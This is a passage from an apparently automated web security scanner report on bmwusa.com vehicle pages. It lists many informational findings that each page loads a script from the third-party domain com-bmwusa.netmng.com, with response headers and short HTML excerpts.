The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:20 GMT;path=/
Content-Length: 214887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.48. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:51 GMT;path=/
Content-Length: 226399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.49. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:29:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:49:23 GMT;path=/
Content-Length: 216239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.50. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:39:58 GMT;path=/
Content-Length: 202158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.51. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:40 GMT;path=/
Content-Length: 212973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.52. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:07 GMT;path=/
Content-Length: 200604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.53. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:59 GMT;path=/
Content-Length: 215188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.54. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:05 GMT;path=/
Content-Length: 201974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.55. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:45 GMT;path=/
Content-Length: 214690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.56. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:09 GMT;path=/
Content-Length: 225674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.57. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:53 GMT;path=/
Content-Length: 215545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.58. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:48 GMT;path=/
Content-Length: 202357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.59. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:00 GMT;path=/
Content-Length: 213889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.60. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:59 GMT;path=/
Content-Length: 226292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.61. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:11 GMT;path=/
Content-Length: 216599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.62. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:39 GMT;path=/
Content-Length: 202376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.63. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:09 GMT;path=/
Content-Length: 214938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.64. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:47 GMT;path=/
Content-Length: 201402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.65. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:33 GMT;path=/
Content-Length: 216450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.66. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:11:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:31:53 GMT;path=/
Content-Length: 202375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.67. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:49:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:09:23 GMT;path=/
Content-Length: 202376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.68. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:18 GMT;path=/
Content-Length: 215003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.69. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:50:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:10:44 GMT;path=/
Content-Length: 201885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.70. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:27 GMT;path=/
Content-Length: 216441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.71. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:36 GMT;path=/
Content-Length: 202621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.72. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:13 GMT;path=/
Content-Length: 215034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.73. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
